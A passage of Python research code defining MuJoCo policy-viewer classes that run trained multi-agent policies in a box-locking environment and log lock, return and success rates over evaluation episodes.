action_movement = np.stack(action_movement, axis = 0)
action_glueall = np.stack(action_glueall, axis = 0)
action_pull = np.stack(action_pull, axis = 0)
one_env_action = {'action_movement': action_movement, 'action_pull': action_pull, 'action_glueall': action_glueall}
self.dict_obs, rew, done, env_info = self.env.step(one_env_action)
self.total_rew += rew
self.obs = []
self.share_obs = []
reshape_obs, reshape_share_obs = handle_dict_obs(self.keys, self.order_obs, self.mask_order_obs, self.dict_obs, self.num_agents, self.num_hiders)
self.obs.append(reshape_obs)
self.share_obs.append(reshape_share_obs)
self.obs = np.array(self.obs).astype(np.float32)
self.share_obs = np.array(self.share_obs).astype(np.float32)
self.recurrent_hidden_states = np.array(recurrent_hidden_statess).transpose(1,0,2)
self.recurrent_hidden_states_critic = np.array(recurrent_hidden_statess_critic).transpose(1,0,2)
if done or env_info.get('discard_episode', False):
self.reset_increment()
if self.display_window:
self.add_overlay(const.GRID_TOPRIGHT, "Reset env; (current seed: {})".format(self.seed), "N - next / P - previous ")
self.add_overlay(const.GRID_TOPRIGHT, "Reward", str(self.total_rew))
if hasattr(self.env.unwrapped, "viewer_stats"):
for k, v in self.env.unwrapped.viewer_stats.items():
self.add_overlay(const.GRID_TOPRIGHT, k, str(v))
self.env.render()
def reset_increment(self):
self.total_rew_avg = (self.n_episodes * self.total_rew_avg + self.total_rew) / (self.n_episodes + 1)
self.n_episodes += 1
print(f"Reward: {self.total_rew} (rolling average: {self.total_rew_avg})")
self.total_rew = 0.0
self.seed += 1
self.env.seed(self.seed)
self.dict_obs = self.env.reset()
self.obs = []
self.share_obs = []
reshape_obs, reshape_share_obs = handle_dict_obs(self.keys, self.order_obs, self.mask_order_obs, self.dict_obs, self.num_agents, self.num_hiders)
self.obs.append(reshape_obs)
self.share_obs.append(reshape_share_obs)
self.obs = np.array(self.obs).astype(np.float32)
self.share_obs = np.array(self.share_obs).astype(np.float32)
self.recurrent_hidden_states = np.zeros((1, self.num_agents, 64)).astype(np.float32)
self.recurrent_hidden_states_critic = np.zeros((1, self.num_agents, 64)).astype(np.float32)
#for policy in self.policies:
# policy.reset()
if hasattr(self.env, "reset_goal"):
self.goal = self.env.reset_goal()
self.update_sim(self.env.unwrapped.sim)
class PolicyViewer_bl(MjViewer):
'''
PolicyViewer runs a policy with an environment and optionally displays it.
env - environment to run policy in
policy - policy object to run
display_window - if true, show the graphical viewer
seed - environment seed to view
duration - time in seconds to run the policy, run forever if duration=None
'''
@store_args
def __init__(self, args, env, policies, display_window=True, seed=None, duration=None):
if seed is None:
self.seed = env.seed()[0]
else:
self.seed = seed
env.seed(seed)
self.args = args
self.num_agents = args.num_agents
self.total_rew = 0.0
self.dict_obs = env.reset()
self.eval_num = 10
self.eval_episode = 0
self.success_rate_sum = 0
self.step = 0
self.H = 5
#for policy in self.policies:
# policy.reset()
#assert env.metadata['n_actors'] % len(policies) == 0
if hasattr(env, "reset_goal"):
self.goal = env.reset_goal()
super().__init__(self.env.unwrapped.sim)
# TO DO: remove circular dependency on viewer object. It looks fishy.
self.env.unwrapped.viewer = self
if self.render and self.display_window:
self.env.render()
def key_callback(self, window, key, scancode, action, mods):
super().key_callback(window, key, scancode, action, mods)
# Trigger on keyup only:
if action != glfw.RELEASE:
return
# Increment experiment seed
if key == glfw.KEY_N:
self.reset_increment()
# Decrement experiment trial
elif key == glfw.KEY_P:
print("Pressed P")
self.seed = max(self.seed - 1, 0)
self.env.seed(self.seed)
self.ob = self.env.reset()
for policy in self.policies:
policy.reset()
if hasattr(self.env, "reset_goal"):
self.goal = self.env.reset_goal()
self.update_sim(self.env.unwrapped.sim)
def run(self):
self.action_movement_dim = []
self.order_obs = ['agent_qpos_qvel', 'box_obs', 'ramp_obs', 'construction_site_obs', 'observation_self']
self.mask_order_obs = [None, None, None, None, None]
for agent_id in range(self.num_agents):
# deal with dict action space
action_movement = self.env.action_space['action_movement'][agent_id].nvec
self.action_movement_dim.append(len(action_movement))
# generate the obs space
obs_shape = []
obs_dim = 0
for key in self.order_obs:
if key in self.env.observation_space.spaces.keys():
space = list(self.env.observation_space[key].shape)
if len(space)<2:
space.insert(0,1)
obs_shape.append(space)
obs_dim += reduce(lambda x,y:x*y,space)
obs_shape.insert(0,obs_dim)
split_shape = obs_shape[1:]
self.policies[0].base.obs_shape = obs_shape
self.policies[0].base.encoder_actor.embedding.split_shape = split_shape
self.policies[0].base.encoder_critic.embedding.split_shape = split_shape
self.masks = np.ones((1, self.num_agents, 1)).astype(np.float32)
if self.duration is not None:
self.end_time = time.time() + self.duration
self.total_rew_avg = 0.0
self.n_episodes = 0
self.obs = []
self.share_obs = []
for i, key in enumerate(self.order_obs):
if key in self.env.observation_space.spaces.keys():
if self.mask_order_obs[i] == None:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_obs = temp_share_obs.copy()
else:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_mask = self.dict_obs[self.mask_order_obs[i]].copy()
temp_obs = self.dict_obs[key].copy()
mins_temp_mask = ~temp_mask
temp_obs[mins_temp_mask]=np.zeros(((mins_temp_mask).sum(),temp_obs.shape[2]))
temp_obs = temp_obs.reshape(self.num_agents,-1)
if i == 0:
reshape_obs = temp_obs.copy()
reshape_share_obs = temp_share_obs.copy()
else:
reshape_obs = np.concatenate((reshape_obs,temp_obs),axis=1)
reshape_share_obs = np.concatenate((reshape_share_obs,temp_share_obs),axis=1)
self.obs.append(reshape_obs)
self.share_obs.append(reshape_share_obs)
self.obs = np.array(self.obs).astype(np.float32)
self.share_obs = np.array(self.share_obs).astype(np.float32)
self.recurrent_hidden_states = np.zeros((1, self.num_agents, 64)).astype(np.float32)
self.recurrent_hidden_states_critic = np.zeros((1, self.num_agents, 64)).astype(np.float32)
self.test_lock_rate = np.zeros(self.args.episode_length)
self.test_return_rate = np.zeros(self.args.episode_length)
self.test_success_rate = np.zeros(self.args.episode_length)
while (self.duration is None or time.time() < self.end_time) and self.eval_episode < self.eval_num:
values = []
actions= []
recurrent_hidden_statess = []
recurrent_hidden_statess_critic = []
with torch.no_grad():
for agent_id in range(self.num_agents):
self.policies[0].eval()
value, action, action_log_prob, recurrent_hidden_states, recurrent_hidden_states_critic = self.policies[0].act(agent_id,
torch.tensor(self.share_obs[:,agent_id,:]),
torch.tensor(self.obs[:,agent_id,:]),
torch.tensor(self.recurrent_hidden_states[:,agent_id,:]),
torch.tensor(self.recurrent_hidden_states_critic[:,agent_id,:]),
torch.tensor(self.masks[:,agent_id,:]))
values.append(value.detach().cpu().numpy())
actions.append(action.detach().cpu().numpy())
recurrent_hidden_statess.append(recurrent_hidden_states.detach().cpu().numpy())
recurrent_hidden_statess_critic.append(recurrent_hidden_states_critic.detach().cpu().numpy())
action_movement = []
action_pull = []
action_glueall = []
for agent_id in range(self.num_agents):
action_movement.append(actions[agent_id][0][:self.action_movement_dim[agent_id]])
action_glueall.append(int(actions[agent_id][0][self.action_movement_dim[agent_id]]))
if 'action_pull' in self.env.action_space.spaces.keys():
action_pull.append(int(actions[agent_id][0][-1]))
action_movement = np.stack(action_movement, axis = 0)
action_glueall = np.stack(action_glueall, axis = 0)
if 'action_pull' in self.env.action_space.spaces.keys():
action_pull = np.stack(action_pull, axis = 0)
one_env_action = {'action_movement': action_movement, 'action_pull': action_pull, 'action_glueall': action_glueall}
self.dict_obs, rew, done, env_info = self.env.step(one_env_action)
self.step += 1
#READ INFO
self.test_lock_rate[self.step] = env_info['lock_rate']
self.test_return_rate[self.step] = env_info['return_rate']
if env_info['lock_rate'] == 1:
self.test_success_rate[self.step] = env_info['return_rate']
else:
self.test_success_rate[self.step] = 0
# print("Step %d Lock Rate"%self.step, self.test_lock_rate[self.step])
# print("Step %d Return Rate"%self.step, self.test_return_rate[self.step])
# print("Step %d Success Rate"%self.step, self.test_success_rate[self.step])
#print(self.dict_obs['box_obs'][0][0])
self.total_rew += rew
self.is_lock = self.test_lock_rate[self.step]
self.is_return = self.test_return_rate[self.step]
self.obs = []
self.share_obs = []
for i, key in enumerate(self.order_obs):
if key in self.env.observation_space.spaces.keys():
if self.mask_order_obs[i] == None:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_obs = temp_share_obs.copy()
else:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_mask = self.dict_obs[self.mask_order_obs[i]].copy()
temp_obs = self.dict_obs[key].copy()
mins_temp_mask = ~temp_mask
temp_obs[mins_temp_mask]=np.zeros(((mins_temp_mask).sum(),temp_obs.shape[2]))
temp_obs = temp_obs.reshape(self.num_agents,-1)
if i == 0:
reshape_obs = temp_obs.copy()
reshape_share_obs = temp_share_obs.copy()
else:
reshape_obs = np.concatenate((reshape_obs,temp_obs),axis=1)
reshape_share_obs = np.concatenate((reshape_share_obs,temp_share_obs),axis=1)
self.obs.append(reshape_obs)
self.share_obs.append(reshape_share_obs)
self.obs = np.array(self.obs).astype(np.float32)
self.share_obs = np.array(self.share_obs).astype(np.float32)
self.recurrent_hidden_states = np.array(recurrent_hidden_statess).transpose(1,0,2)
self.recurrent_hidden_states_critic = np.array(recurrent_hidden_statess_critic).transpose(1,0,2)
if done or env_info.get('discard_episode', False) or self.step >= self.args.episode_length - 1:
self.eval_episode += 1
self.success_rate_sum += np.mean(self.test_success_rate[-self.H:])
print("Test Episode %d/%d Success Rate:"%(self.eval_episode, self.eval_num), np.mean(self.test_success_rate[-self.H:]))
self.reset_increment()
if self.display_window:
self.add_overlay(const.GRID_TOPRIGHT, "Reset env; (current seed: {})".format(self.seed), "N - next / P - previous ")
self.add_overlay(const.GRID_TOPRIGHT, "Reward", str(self.total_rew))
self.add_overlay(const.GRID_TOPRIGHT, "Lock", str(self.is_lock))
self.add_overlay(const.GRID_TOPRIGHT, "Return", str(self.is_return))
if hasattr(self.env.unwrapped, "viewer_stats"):
for k, v in self.env.unwrapped.viewer_stats.items():
self.add_overlay(const.GRID_TOPRIGHT, k, str(v))
self.env.render()
if self.eval_episode == self.eval_num:
print("Mean Success Rate:", self.success_rate_sum / self.eval_num)
def reset_increment(self):
self.total_rew_avg = (self.n_episodes * self.total_rew_avg + self.total_rew) / (self.n_episodes + 1)
self.n_episodes += 1
print(f"Reward: {self.total_rew} (rolling average: {self.total_rew_avg})")
self.total_rew = 0.0
self.seed += 1
self.env.seed(self.seed)
self.dict_obs = self.env.reset()
self.obs = []
self.share_obs = []
# reset the buffer
self.test_lock_rate = np.zeros(self.args.episode_length)
self.test_return_rate = np.zeros(self.args.episode_length)
self.test_success_rate = np.zeros(self.args.episode_length)
self.step = 0
for i, key in enumerate(self.order_obs):
if key in self.env.observation_space.spaces.keys():
if self.mask_order_obs[i] == None:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_obs = temp_share_obs.copy()
else:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_mask = self.dict_obs[self.mask_order_obs[i]].copy()
temp_obs = self.dict_obs[key].copy()
mins_temp_mask = ~temp_mask
temp_obs[mins_temp_mask]=np.zeros(((mins_temp_mask).sum(),temp_obs.shape[2]))
temp_obs = temp_obs.reshape(self.num_agents,-1)
if i == 0:
reshape_obs = temp_obs.copy()
reshape_share_obs = temp_share_obs.copy()
else:
reshape_obs = np.concatenate((reshape_obs,temp_obs),axis=1)
reshape_share_obs = np.concatenate((reshape_share_obs,temp_share_obs),axis=1)
self.obs.append(reshape_obs)
self.share_obs.append(reshape_share_obs)
self.obs = np.array(self.obs).astype(np.float32)
self.share_obs = np.array(self.share_obs).astype(np.float32)
self.recurrent_hidden_states = np.zeros((1, self.num_agents, 64)).astype(np.float32)
self.recurrent_hidden_states_critic = np.zeros((1, self.num_agents, 64)).astype(np.float32)
#for policy in self.policies:
# policy.reset()
if hasattr(self.env, "reset_goal"):
self.goal = self.env.reset_goal()
self.update_sim(self.env.unwrapped.sim)
class PolicyViewer_bl_good_case(MjViewer):
'''
PolicyViewer runs a policy with an environment and optionally displays it.
env - environment to run policy in
policy - policy object to run
display_window - if true, show the graphical viewer
seed - environment seed to view
duration - time in seconds to run the policy, run forever if duration=None
'''
@store_args
def __init__(self, args, env, policies, display_window=True, seed=None, duration=None):
if seed is None:
self.seed = env.seed()[0]
else:
self.seed = seed
env.seed(seed)
self.args = args
self.num_agents = args.num_agents
self.total_rew = 0.0
# init starts
self.eval_num = 1
self.eval_episode = 0
self.success_rate_sum = 0
self.step = 0
self.H = 5
buffer_length = 2000
boundary = args.grid_size-2
boundary_quadrant = [round(args.grid_size / 2), args.grid_size-3, 1, round(args.grid_size/2)-3]
        start_boundary = [round(args.grid_size / 2), args.grid_size-3, 1, round(args.grid_size/2)-3] # x1,x2,y1,y2 quadrant set
last_node = node_buffer(args.num_agents, args.num_boxes, buffer_length,
archive_initial_length=args.n_rollout_threads,
reproduction_num=160,
max_step=1,
start_boundary=start_boundary,
boundary=boundary,
boundary_quadrant=boundary_quadrant)
#self.starts = last_node.produce_good_case(self.eval_num, start_boundary, args.num_agents, args.num_boxes)
self.starts = [[np.array([16, 4]), np.array([21, 2]), np.array([22, 2]), np.array([16, 4])]]
print("[starts]", self.starts[0])
self.dict_obs = env.reset(self.starts[0])
#for policy in self.policies:
# policy.reset()
#assert env.metadata['n_actors'] % len(policies) == 0
if hasattr(env, "reset_goal"):
self.goal = env.reset_goal()
super().__init__(self.env.unwrapped.sim)
# TO DO: remove circular dependency on viewer object. It looks fishy.
self.env.unwrapped.viewer = self
if self.render and self.display_window:
self.env.render()
def key_callback(self, window, key, scancode, action, mods):
super().key_callback(window, key, scancode, action, mods)
# Trigger on keyup only:
if action != glfw.RELEASE:
return
# Increment experiment seed
if key == glfw.KEY_N:
self.reset_increment()
# Decrement experiment trial
elif key == glfw.KEY_P:
print("Pressed P")
self.seed = max(self.seed - 1, 0)
self.env.seed(self.seed)
self.ob = self.env.reset()
for policy in self.policies:
policy.reset()
if hasattr(self.env, "reset_goal"):
self.goal = self.env.reset_goal()
self.update_sim(self.env.unwrapped.sim)
def run(self):
self.action_movement_dim = []
self.order_obs = ['agent_qpos_qvel', 'box_obs', 'ramp_obs', 'construction_site_obs', 'observation_self']
self.mask_order_obs = [None, None, None, None, None]
for agent_id in range(self.num_agents):
# deal with dict action space
action_movement = self.env.action_space['action_movement'][agent_id].nvec
self.action_movement_dim.append(len(action_movement))
# generate the obs space
obs_shape = []
obs_dim = 0
for key in self.order_obs:
if key in self.env.observation_space.spaces.keys():
space = list(self.env.observation_space[key].shape)
if len(space)<2:
space.insert(0,1)
obs_shape.append(space)
obs_dim += reduce(lambda x,y:x*y,space)
obs_shape.insert(0,obs_dim)
split_shape = obs_shape[1:]
self.policies[0].base.obs_shape = obs_shape
self.policies[0].base.encoder_actor.embedding.split_shape = split_shape
self.policies[0].base.encoder_critic.embedding.split_shape = split_shape
self.masks = np.ones((1, self.num_agents, 1)).astype(np.float32)
if self.duration is not None:
self.end_time = time.time() + self.duration
self.total_rew_avg = 0.0
self.n_episodes = 0
self.obs = []
self.share_obs = []
for i, key in enumerate(self.order_obs):
if key in self.env.observation_space.spaces.keys():
                if self.mask_order_obs[i] is None:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_obs = temp_share_obs.copy()
else:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_mask = self.dict_obs[self.mask_order_obs[i]].copy()
temp_obs = self.dict_obs[key].copy()
mins_temp_mask = ~temp_mask
temp_obs[mins_temp_mask]=np.zeros(((mins_temp_mask).sum(),temp_obs.shape[2]))
temp_obs = temp_obs.reshape(self.num_agents,-1)
if i == 0:
reshape_obs = temp_obs.copy()
reshape_share_obs = temp_share_obs.copy()
else:
reshape_obs = np.concatenate((reshape_obs,temp_obs),axis=1)
reshape_share_obs = np.concatenate((reshape_share_obs,temp_share_obs),axis=1)
self.obs.append(reshape_obs)
self.share_obs.append(reshape_share_obs)
self.obs = np.array(self.obs).astype(np.float32)
self.share_obs = np.array(self.share_obs).astype(np.float32)
self.recurrent_hidden_states = np.zeros((1, self.num_agents, 64)).astype(np.float32)
self.recurrent_hidden_states_critic = np.zeros((1, self.num_agents, 64)).astype(np.float32)
self.test_lock_rate = np.zeros(self.args.episode_length)
self.test_return_rate = np.zeros(self.args.episode_length)
self.test_success_rate = np.zeros(self.args.episode_length)
while self.duration is None or time.time() < self.end_time or self.eval_episode <= self.eval_num:
values = []
actions= []
recurrent_hidden_statess = []
recurrent_hidden_statess_critic = []
with torch.no_grad():
for agent_id in range(self.num_agents):
self.policies[0].eval()
value, action, action_log_prob, recurrent_hidden_states, recurrent_hidden_states_critic = self.policies[0].act(agent_id,
torch.tensor(self.share_obs[:,agent_id,:]),
torch.tensor(self.obs[:,agent_id,:]),
torch.tensor(self.recurrent_hidden_states[:,agent_id,:]),
torch.tensor(self.recurrent_hidden_states_critic[:,agent_id,:]),
torch.tensor(self.masks[:,agent_id,:]))
values.append(value.detach().cpu().numpy())
actions.append(action.detach().cpu().numpy())
recurrent_hidden_statess.append(recurrent_hidden_states.detach().cpu().numpy())
recurrent_hidden_statess_critic.append(recurrent_hidden_states_critic.detach().cpu().numpy())
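            # Assemble the per-agent network outputs into the dict action expected by
            # the env: the first action_movement_dim entries are movement, the next
            # entry is the glue-all flag, and (when present) the last entry is pull.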
action_movement = []
action_pull = []
action_glueall = []
for agent_id in range(self.num_agents):
action_movement.append(actions[agent_id][0][:self.action_movement_dim[agent_id]])
action_glueall.append(int(actions[agent_id][0][self.action_movement_dim[agent_id]]))
if 'action_pull' in self.env.action_space.spaces.keys():
action_pull.append(int(actions[agent_id][0][-1]))
action_movement = np.stack(action_movement, axis = 0)
action_glueall = np.stack(action_glueall, axis = 0)
if 'action_pull' in self.env.action_space.spaces.keys():
action_pull = np.stack(action_pull, axis = 0)
one_env_action = {'action_movement': action_movement, 'action_pull': action_pull, 'action_glueall': action_glueall}
self.dict_obs, rew, done, env_info = self.env.step(one_env_action)
self.step += 1
#READ INFO
self.test_lock_rate[self.step] = env_info['lock_rate']
self.test_return_rate[self.step] = env_info['return_rate']
if env_info['lock_rate'] == 1:
self.test_success_rate[self.step] = env_info['return_rate']
else:
self.test_success_rate[self.step] = 0
#print(self.dict_obs['box_obs'][0][0])
self.total_rew += rew
self.obs = []
self.share_obs = []
for i, key in enumerate(self.order_obs):
if key in self.env.observation_space.spaces.keys():
                    if self.mask_order_obs[i] is None:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_obs = temp_share_obs.copy()
else:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_mask = self.dict_obs[self.mask_order_obs[i]].copy()
temp_obs = self.dict_obs[key].copy()
mins_temp_mask = ~temp_mask
temp_obs[mins_temp_mask]=np.zeros(((mins_temp_mask).sum(),temp_obs.shape[2]))
temp_obs = temp_obs.reshape(self.num_agents,-1)
if i == 0:
reshape_obs = temp_obs.copy()
reshape_share_obs = temp_share_obs.copy()
else:
reshape_obs = np.concatenate((reshape_obs,temp_obs),axis=1)
reshape_share_obs = np.concatenate((reshape_share_obs,temp_share_obs),axis=1)
self.obs.append(reshape_obs)
self.share_obs.append(reshape_share_obs)
self.obs = np.array(self.obs).astype(np.float32)
self.share_obs = np.array(self.share_obs).astype(np.float32)
self.recurrent_hidden_states = np.array(recurrent_hidden_statess).transpose(1,0,2)
self.recurrent_hidden_states_critic = np.array(recurrent_hidden_statess_critic).transpose(1,0,2)
if done or env_info.get('discard_episode', False) or self.step >= self.args.episode_length - 1:
self.eval_episode += 1
self.success_rate_sum += np.mean(self.test_success_rate[-self.H:])
print("Test Episode %d/%d Success Rate:"%(self.eval_episode, self.eval_num), np.mean(self.test_success_rate[-self.H:]))
if self.eval_episode == self.eval_num:
break
self.reset_increment()
if self.display_window:
self.add_overlay(const.GRID_TOPRIGHT, "Reset env; (current seed: {})".format(self.seed), "N - next / P - previous ")
self.add_overlay(const.GRID_TOPRIGHT, "Reward", str(self.total_rew))
if hasattr(self.env.unwrapped, "viewer_stats"):
for k, v in self.env.unwrapped.viewer_stats.items():
self.add_overlay(const.GRID_TOPRIGHT, k, str(v))
self.env.render()
if self.eval_episode == self.eval_num:
print("Mean Success Rate:", self.success_rate_sum / self.eval_num)
def reset_increment(self):
self.total_rew_avg = (self.n_episodes * self.total_rew_avg + self.total_rew) / (self.n_episodes + 1)
self.n_episodes += 1
print(f"Reward: {self.total_rew} (rolling average: {self.total_rew_avg})")
self.total_rew = 0.0
self.seed += 1
self.env.seed(self.seed)
print("[starts]", self.starts[self.eval_episode])
self.dict_obs = self.env.reset(self.starts[self.eval_episode])
self.obs = []
self.share_obs = []
# reset the buffer
self.test_lock_rate = np.zeros(self.args.episode_length)
self.test_return_rate = np.zeros(self.args.episode_length)
self.test_success_rate = np.zeros(self.args.episode_length)
self.step = 0
for i, key in enumerate(self.order_obs):
if key in self.env.observation_space.spaces.keys():
                if self.mask_order_obs[i] is None:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_obs = temp_share_obs.copy()
else:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_mask = self.dict_obs[self.mask_order_obs[i]].copy()
temp_obs = self.dict_obs[key].copy()
mins_temp_mask = ~temp_mask
temp_obs[mins_temp_mask]=np.zeros(((mins_temp_mask).sum(),temp_obs.shape[2]))
temp_obs = temp_obs.reshape(self.num_agents,-1)
if i == 0:
reshape_obs = temp_obs.copy()
reshape_share_obs = temp_share_obs.copy()
else:
reshape_obs = np.concatenate((reshape_obs,temp_obs),axis=1)
reshape_share_obs = np.concatenate((reshape_share_obs,temp_share_obs),axis=1)
self.obs.append(reshape_obs)
self.share_obs.append(reshape_share_obs)
self.obs = np.array(self.obs).astype(np.float32)
self.share_obs = np.array(self.share_obs).astype(np.float32)
self.recurrent_hidden_states = np.zeros((1, self.num_agents, 64)).astype(np.float32)
self.recurrent_hidden_states_critic = np.zeros((1, self.num_agents, 64)).astype(np.float32)
#for policy in self.policies:
# policy.reset()
if hasattr(self.env, "reset_goal"):
self.goal = self.env.reset_goal()
self.update_sim(self.env.unwrapped.sim)
class PolicyViewer_sc(MjViewer):
'''
PolicyViewer runs a policy with an environment and optionally displays it.
env - environment to run policy in
policy - policy object to run
display_window - if true, show the graphical viewer
seed - environment seed to view
duration - time in seconds to run the policy, run forever if duration=None
'''
@store_args
def __init__(self, env, policies, display_window=True, seed=None, duration=None):
if seed is None:
self.seed = env.seed()[0]
else:
self.seed = seed
env.seed(seed)
self.total_rew = 0.0
self.dict_obs = env.reset()
#for policy in self.policies:
# policy.reset()
#assert env.metadata['n_actors'] % len(policies) == 0
if hasattr(env, "reset_goal"):
self.goal = env.reset_goal()
super().__init__(self.env.unwrapped.sim)
# TO DO: remove circular dependency on viewer object. It looks fishy.
self.env.unwrapped.viewer = self
if self.render and self.display_window:
self.env.render()
def key_callback(self, window, key, scancode, action, mods):
super().key_callback(window, key, scancode, action, mods)
# Trigger on keyup only:
if action != glfw.RELEASE:
return
# Increment experiment seed
if key == glfw.KEY_N:
self.reset_increment()
# Decrement experiment trial
elif key == glfw.KEY_P:
print("Pressed P")
self.seed = max(self.seed - 1, 0)
self.env.seed(self.seed)
self.ob = self.env.reset()
for policy in self.policies:
policy.reset()
if hasattr(self.env, "reset_goal"):
self.goal = self.env.reset_goal()
self.update_sim(self.env.unwrapped.sim)
def run(self):
self.action_movement_dim = []
'''
self.order_obs = ['agent_qpos_qvel','box_obs','ramp_obs','food_obs','observation_self']
self.mask_order_obs = ['mask_aa_obs','mask_ab_obs','mask_ar_obs','mask_af_obs',None]
'''
self.order_obs = ['box_obs','ramp_obs','construction_site_obs','vector_door_obs', 'observation_self']
self.mask_order_obs = ['mask_ab_obs','mask_ar_obs',None,None,None]
self.num_agents = 1
for agent_id in range(self.num_agents):
# deal with dict action space
action_movement = self.env.action_space['action_movement'][agent_id].nvec
self.action_movement_dim.append(len(action_movement))
self.masks = np.ones((1, self.num_agents, 1)).astype(np.float32)
if self.duration is not None:
self.end_time = time.time() + self.duration
self.total_rew_avg = 0.0
self.n_episodes = 0
self.obs = []
self.share_obs = []
print(self.dict_obs)
for i, key in enumerate(self.order_obs):
if key in self.env.observation_space.spaces.keys():
                if self.mask_order_obs[i] is None:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_obs = temp_share_obs.copy()
else:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_mask = self.dict_obs[self.mask_order_obs[i]].copy()
temp_obs = self.dict_obs[key].copy()
mins_temp_mask = ~temp_mask
temp_obs[mins_temp_mask]=np.zeros(((mins_temp_mask).sum(),temp_obs.shape[2]))
temp_obs = temp_obs.reshape(self.num_agents,-1)
if i == 0:
reshape_obs = temp_obs.copy()
reshape_share_obs = temp_share_obs.copy()
else:
reshape_obs = np.concatenate((reshape_obs,temp_obs),axis=1)
reshape_share_obs = np.concatenate((reshape_share_obs,temp_share_obs),axis=1)
self.obs.append(reshape_obs)
self.share_obs.append(reshape_share_obs)
self.obs = np.array(self.obs).astype(np.float32)
self.share_obs = np.array(self.share_obs).astype(np.float32)
self.recurrent_hidden_states = np.zeros((1, self.num_agents, 64)).astype(np.float32)
self.recurrent_hidden_states_critic = np.zeros((1, self.num_agents, 64)).astype(np.float32)
print(self.obs)
print(self.share_obs)
while self.duration is None or time.time() < self.end_time:
values = []
actions= []
recurrent_hidden_statess = []
recurrent_hidden_statess_critic = []
with torch.no_grad():
for agent_id in range(self.num_agents):
self.policies[0].eval()
value, action, action_log_prob, recurrent_hidden_states, recurrent_hidden_states_critic = self.policies[0].act(agent_id,
torch.tensor(self.share_obs[:,agent_id,:]),
torch.tensor(self.obs[:,agent_id,:]),
torch.tensor(self.recurrent_hidden_states[:,agent_id,:]),
torch.tensor(self.recurrent_hidden_states_critic[:,agent_id,:]),
torch.tensor(self.masks[:,agent_id,:]))
values.append(value.detach().cpu().numpy())
actions.append(action.detach().cpu().numpy())
recurrent_hidden_statess.append(recurrent_hidden_states.detach().cpu().numpy())
recurrent_hidden_statess_critic.append(recurrent_hidden_states_critic.detach().cpu().numpy())
action_movement = []
action_pull = []
action_glueall = []
for agent_id in range(self.num_agents):
action_movement.append(actions[agent_id][0][:self.action_movement_dim[agent_id]])
action_glueall.append(int(actions[agent_id][0][self.action_movement_dim[agent_id]]))
if 'action_pull' in self.env.action_space.spaces.keys():
action_pull.append(int(actions[agent_id][0][-1]))
action_movement = np.stack(action_movement, axis = 0)
action_glueall = np.stack(action_glueall, axis = 0)
if 'action_pull' in self.env.action_space.spaces.keys():
action_pull = np.stack(action_pull, axis = 0)
one_env_action = {'action_movement': action_movement, 'action_pull': action_pull, 'action_glueall': action_glueall}
print(action_pull)
self.dict_obs, rew, done, env_info = self.env.step(one_env_action)
print(self.dict_obs)
self.total_rew += rew
self.obs = []
self.share_obs = []
for i, key in enumerate(self.order_obs):
if key in self.env.observation_space.spaces.keys():
                    if self.mask_order_obs[i] is None:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_obs = temp_share_obs.copy()
else:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_mask = self.dict_obs[self.mask_order_obs[i]].copy()
temp_obs = self.dict_obs[key].copy()
mins_temp_mask = ~temp_mask
temp_obs[mins_temp_mask]=np.zeros(((mins_temp_mask).sum(),temp_obs.shape[2]))
temp_obs = temp_obs.reshape(self.num_agents,-1)
if i == 0:
reshape_obs = temp_obs.copy()
reshape_share_obs = temp_share_obs.copy()
else:
reshape_obs = np.concatenate((reshape_obs,temp_obs),axis=1)
reshape_share_obs = np.concatenate((reshape_share_obs,temp_share_obs),axis=1)
self.obs.append(reshape_obs)
self.share_obs.append(reshape_share_obs)
self.obs = np.array(self.obs).astype(np.float32)
self.share_obs = np.array(self.share_obs).astype(np.float32)
self.recurrent_hidden_states = np.array(recurrent_hidden_statess).transpose(1,0,2)
self.recurrent_hidden_states_critic = np.array(recurrent_hidden_statess_critic).transpose(1,0,2)
if done or env_info.get('discard_episode', False):
self.reset_increment()
if self.display_window:
self.add_overlay(const.GRID_TOPRIGHT, "Reset env; (current seed: {})".format(self.seed), "N - next / P - previous ")
self.add_overlay(const.GRID_TOPRIGHT, "Reward", str(self.total_rew))
if hasattr(self.env.unwrapped, "viewer_stats"):
for k, v in self.env.unwrapped.viewer_stats.items():
self.add_overlay(const.GRID_TOPRIGHT, k, str(v))
self.env.render()
def reset_increment(self):
self.total_rew_avg = (self.n_episodes * self.total_rew_avg + self.total_rew) / (self.n_episodes + 1)
self.n_episodes += 1
print(f"Reward: {self.total_rew} (rolling average: {self.total_rew_avg})")
self.total_rew = 0.0
self.seed += 1
self.env.seed(self.seed)
self.dict_obs = self.env.reset()
self.obs = []
self.share_obs = []
for i, key in enumerate(self.order_obs):
if key in self.env.observation_space.spaces.keys():
                if self.mask_order_obs[i] is None:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_obs = temp_share_obs.copy()
else:
temp_share_obs = self.dict_obs[key].reshape(self.num_agents,-1).copy()
temp_mask = self.dict_obs[self.mask_order_obs[i]].copy()
temp_obs = self.dict_obs[key].copy()
mins_temp_mask = ~temp_mask
temp_obs[mins_temp_mask]=np.zeros(((mins_temp_mask).sum(),temp_obs.shape[2]))
temp_obs = temp_obs.reshape(self.num_agents,-1)
if i == 0:
reshape_obs = temp_obs.copy()
reshape_share_obs = temp_share_obs.copy()
else:
reshape_obs = np.concatenate((reshape_obs,temp_obs),axis=1)
reshape_share_obs = np.concatenate((reshape_share_obs,temp_share_obs),axis=1)
self.obs.append(reshape_obs)
self.share_obs.append(reshape_share_obs)
